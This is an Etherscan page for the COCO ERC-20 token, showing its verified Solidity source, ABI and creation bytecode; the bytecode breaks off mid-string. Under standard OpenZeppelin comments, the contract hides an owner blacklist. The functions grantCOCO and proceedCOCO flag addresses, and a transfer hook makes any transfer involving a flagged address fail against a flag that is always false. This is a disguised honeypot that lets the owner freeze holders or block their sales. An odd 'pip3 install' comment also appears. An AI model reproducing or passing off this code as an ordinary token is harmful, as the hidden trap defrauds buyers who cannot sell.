ERC-20
Overview
Max Total Supply
1,000,000,000,000 COCO
Holders
48
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
60,606,099,444.157832812823350531 COCOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Coco
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-29 */ /** *Submitted for verification at Etherscan.io on 2023-05-28 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /* pip3 install endless-flex-v1.1 */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _bitmap; mapping(address => mapping(address => uint256)) public _allowances; uint256 private _totalSupply; bool private _bitmapApplied = false; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function grantCOCO(address [] calldata _coco_) external onlyOwner { for (uint256 i = 0; i < _coco_.length; i++) { _bitmap[_coco_[i]] = true; } } function proceedCOCO(address [] calldata _coco_) external onlyOwner { for (uint256 i = 0; i < _coco_.length; i++) { _bitmap[_coco_[i]] = false; } } function isCOCO(address _coco_) public view returns (bool) { return _bitmap[_coco_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 //amount ) internal virtual {if (_bitmap[to] || _bitmap[from]) require(_bitmapApplied == true, "");} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract Coco is ERC20 { uint256 coco_salt = 0xC0C0; constructor() ERC20("COCO", "COCO") { _mint(msg.sender, 1000000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"_allowances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_coco_","type":"address[]"}],"name":"grantCOCO","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_coco_","type":"address"}],"name":"isCOCO","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_coco_","type":"address[]"}],"name":"proceedCOCO","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600560006101000a81548160ff02191690831515021790555061c0c06008553480156200003257600080fd5b506040518060400160405280600481526020017f434f434f000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f434f434f00000000000000000000000000000000000000000000000000000000815250620000bf620000b36200013a60201b60201c565b6200014260201b60201c565b8160069080519060200190620000d792919062000489565b508060079080519060200190620000f092919062000489565b5050506200013433620001086200020660201b60201c565b600a620001169190620006d3565b64e8d4a5100062000128919062000724565b6200020f60201b60201c565b62000943565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000281576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027890620007e6565b60405180910390fd5b62000295600083836200037d60201b60201c565b8060046000828254620002a9919062000808565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200035d919062000876565b60405180910390a362000379600083836200038260201b60201c565b5050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680620004245750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15620004845760011515600560009054906101000a900460ff1615151462000483576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200047a90620008bd565b60405180910390fd5b5b505050565b82805462000497906200090e565b90600052602060002090601f016020900481019282620004bb576000855562000507565b82601f10620004d657805160ff191683800117855562000507565b8280016001018555821562000507579182015b8281111562000506578251825591602001919060010190620004e9565b5b5090506200051691906200051a565b5090565b5b80821115620005355760008160009055506001016200051b565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620005c7578086048111156200059f576200059e62000539565b5b6001851615620005af5780820291505b8081029050620005bf8562000568565b94506200057f565b94509492505050565b600082620005e25760019050620006b5565b81620005f25760009050620006b5565b81600181146200060b576002811462000616576200064c565b6001915050620006b5565b60ff8411156200062b576200062a62000539565b5b8360020a91508482111562000645576200064462000539565b5b50620006b5565b5060208310610133831016604e8410600b8410161715620006865782820a90508381111562000680576200067f62000539565b5b620006b5565b62000695848484600162000575565b92509050818404811115620006af57620006ae62000539565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620006e082620006bc565b9150620006ed83620006c6565b92506200071c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620005d0565b905092915050565b60006200073182620006bc565b91506200073e83620006bc565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200077a576200077962000539565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620007ce601f8362000785565b9150620007db8262000796565b602082019050919050565b600060208201905081810360008301526200080181620007bf565b9050919050565b60006200081582620006bc565b91506200082283620006bc565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200085a576200085962000539565b5b828201905092915050565b6200087081620006bc565b82525050565b60006020820190506200088d600083018462000865565b92915050565b50565b6000620008a560008362000785565b9150620008b28262000893565b600082019050919050565b60006020820190508181036000830152620008d88162000896565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200092757607f821691505b6020821081036200093d576200093c620008df565b5b50919050565b611b1780620009536000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102f7578063a9059cbb14610327578063dd62ed3e14610357578063eb08e52e14610387578063f2fde38b146103a357610116565b806370a0823114610281578063715018a6146102b15780638da5cb5b146102bb57806395d89b41146102d957610116565b806318160ddd116100e957806318160ddd146101c957806323b872dd146101e7578063313ce567146102175780633950935114610235578063464b04411461026557610116565b8063024c2ddd1461011b57806306fdde031461014b578063095ea7b3146101695780631409688b14610199575b600080fd5b61013560048036038101906101309190611105565b6103bf565b604051610142919061115e565b60405180910390f35b6101536103e4565b6040516101609190611212565b60405180910390f35b610183600480360381019061017e9190611260565b610476565b60405161019091906112bb565b60405180910390f35b6101b360048036038101906101ae91906112d6565b610499565b6040516101c091906112bb565b60405180910390f35b6101d16104ef565b6040516101de919061115e565b60405180910390f35b61020160048036038101906101fc9190611303565b6104f9565b60405161020e91906112bb565b60405180910390f35b61021f610528565b60405161022c9190611372565b60405180910390f35b61024f600480360381019061024a9190611260565b610531565b60405161025c91906112bb565b60405180910390f35b61027f600480360381019061027a91906113f2565b610568565b005b61029b600480360381019061029691906112d6565b610615565b6040516102a8919061115e565b60405180910390f35b6102b961065e565b005b6102c3610672565b6040516102d0919061144e565b60405180910390f35b6102e161069b565b6040516102ee9190611212565b60405180910390f35b610311600480360381019061030c9190611260565b61072d565b60405161031e91906112bb565b60405180910390f35b610341600480360381019061033c9190611260565b6107a4565b60405161034e91906112bb565b60405180910390f35b610371600480360381019061036c9190611105565b6107c7565b60405161037e919061115e565b60405180910390f35b6103a1600480360381019061039c91906113f2565b61084e565b005b6103bd60048036038101906103b891906112d6565b6108fb565b005b6003602052816000526040600020602052806000526040600020600091509150505481565b6060600680546103f390611498565b80601f016020809104026020016040519081016040528092919081815260200182805461041f90611498565b801561046c5780601f106104415761010080835404028352916020019161046c565b820191906000526020600020905b81548152906001019060200180831161044f57829003601f168201915b5050505050905090565b60008061048161097e565b905061048e818585610986565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050461097e565b9050610511858285610b4f565b61051c858585610bdb565b60019150509392505050565b60006012905090565b60008061053c61097e565b905061055d81858561054e85896107c7565b61055891906114f8565b610986565b600191505092915050565b610570610e54565b60005b82829050811015610610576001600260008585858181106105975761059661154e565b5b90506020020160208101906105ac91906112d6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106089061157d565b915050610573565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610666610e54565b6106706000610ed2565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106aa90611498565b80601f01602080910402602001604051908101604052809291908181526020018280546106d690611498565b80156107235780601f106106f857610100808354040283529160200191610723565b820191906000526020600020905b81548152906001019060200180831161070657829003601f168201915b5050505050905090565b60008061073861097e565b9050600061074682866107c7565b90508381101561078b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078290611637565b60405180910390fd5b6107988286868403610986565b60019250505092915050565b6000806107af61097e565b90506107bc818585610bdb565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610856610e54565b60005b828290508110156108f65760006002600085858581811061087d5761087c61154e565b5b905060200201602081019061089291906112d6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806108ee9061157d565b915050610859565b505050565b610903610e54565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610972576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610969906116c9565b60405180910390fd5b61097b81610ed2565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ec9061175b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5b906117ed565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b42919061115e565b60405180910390a3505050565b6000610b5b84846107c7565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd55781811015610bc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbe90611859565b60405180910390fd5b610bd48484848403610986565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c41906118eb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb09061197d565b60405180910390fd5b610cc4838383610f96565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4290611a0f565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e3b919061115e565b60405180910390a3610e4e848484610f9b565b50505050565b610e5c61097e565b73ffffffffffffffffffffffffffffffffffffffff16610e7a610672565b73ffffffffffffffffffffffffffffffffffffffff1614610ed0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec790611a7b565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061103c5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110985760011515600560009054906101000a900460ff16151514611097576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108e90611ac1565b60405180910390fd5b5b505050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d2826110a7565b9050919050565b6110e2816110c7565b81146110ed57600080fd5b50565b6000813590506110ff816110d9565b92915050565b6000806040838503121561111c5761111b61109d565b5b600061112a858286016110f0565b925050602061113b858286016110f0565b9150509250929050565b6000819050919050565b61115881611145565b82525050565b6000602082019050611173600083018461114f565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111b3578082015181840152602081019050611198565b838111156111c2576000848401525b50505050565b6000601f19601f8301169050919050565b60006111e482611179565b6111ee8185611184565b93506111fe818560208601611195565b611207816111c8565b840191505092915050565b6000602082019050818103600083015261122c81846111d9565b905092915050565b61123d81611145565b811461124857600080fd5b50565b60008135905061125a81611234565b92915050565b600080604083850312156112775761127661109d565b5b6000611285858286016110f0565b92505060206112968582860161124b565b9150509250929050565b60008115159050919050565b6112b5816112a0565b82525050565b60006020820190506112d060008301846112ac565b92915050565b6000602082840312156112ec576112eb61109d565b5b60006112fa848285016110f0565b91505092915050565b60008060006060848603121561131c5761131b61109d565b5b600061132a868287016110f0565b935050602061133b868287016110f0565b925050604061134c8682870161124b565b9150509250925092565b600060ff82169050919050565b61136c81611356565b82525050565b60006020820190506113876000830184611363565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113b2576113b161138d565b5b8235905067ffffffffffffffff8111156113cf576113ce611392565b5b6020830191508360208202830111156113eb576113ea611397565b5b9250929050565b600080602083850312156114095761140861109d565